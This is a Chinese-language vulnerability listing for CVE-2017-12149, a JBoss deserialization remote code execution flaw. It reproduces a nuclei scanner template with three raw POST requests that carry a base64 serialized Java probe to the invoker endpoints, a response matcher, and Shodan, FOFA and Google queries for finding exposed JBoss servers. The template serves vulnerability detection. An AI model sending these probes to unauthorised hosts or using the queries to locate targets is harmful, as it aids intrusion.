CVE-2017-12149: Jboss Application Server - Remote Code Execution

日期: 2025-08-01 | 影响软件: Jboss Application Server | POC: 已公开

漏洞描述

Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2 is susceptible to a remote code execution vulnerability because the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization, thus allowing an attacker to execute arbitrary code via crafted serialized data.

PoC代码[已公开]

id: CVE-2017-12149

info:
  name: Jboss Application Server - Remote Code Execution
  author: fopina,s0obi
  severity: critical
  description: Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2 is susceptible to a remote code execution vulnerability because  the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization, thus allowing an attacker to execute arbitrary code via crafted serialized data.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized remote code execution on the affected server.
  remediation: |
    Apply the latest security patches and updates provided by Jboss to fix this vulnerability.
  reference:
    - https://chowdera.com/2020/12/20201229190934023w.html
    - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149
    - https://nvd.nist.gov/vuln/detail/CVE-2017-12149
    - https://bugzilla.redhat.com/show_bug.cgi?id=1486220
    - https://access.redhat.com/errata/RHSA-2018:1607
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-12149
    cwe-id: CWE-502
    epss-score: 0.94313
    epss-percentile: 0.99942
    cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:5.0.0:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: redhat
    product: jboss_enterprise_application_platform
    shodan-query:
      - http.title:"jboss"
      - cpe:"cpe:2.3:a:redhat:jboss_enterprise_application_platform"
    fofa-query: title="jboss"
    google-query: intitle:"jboss"
  tags: cve2017,cve,java,rce,deserialization,kev,vulhub,jboss,intrusive,redhat

http:
  - raw:
      - |
        POST /invoker/JMXInvokerServlet/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream

        {{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }}
      - |
        POST /invoker/EJBInvokerServlet/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream

        {{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }}
      - |
        POST /invoker/readonly HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream

        {{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }}

    matchers-condition: and
    matchers:
      - type: word
        part: response
        words:
          - JBoss
          - ClassCastException
        condition: and
        case-insensitive: true

      - type: status
        status:
          - 200
          - 500
# digest: 4b0a00483046022100b0a0ebc70d16c36b46c7641205eac8b28bd4d564fb4bcc7c02b24de0dfe93b240221008b2d477af5ead3c23efe8f988b92ee60813a74ee300d26f36fc85a056a4c9767:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2017/CVE-2017-12149.yaml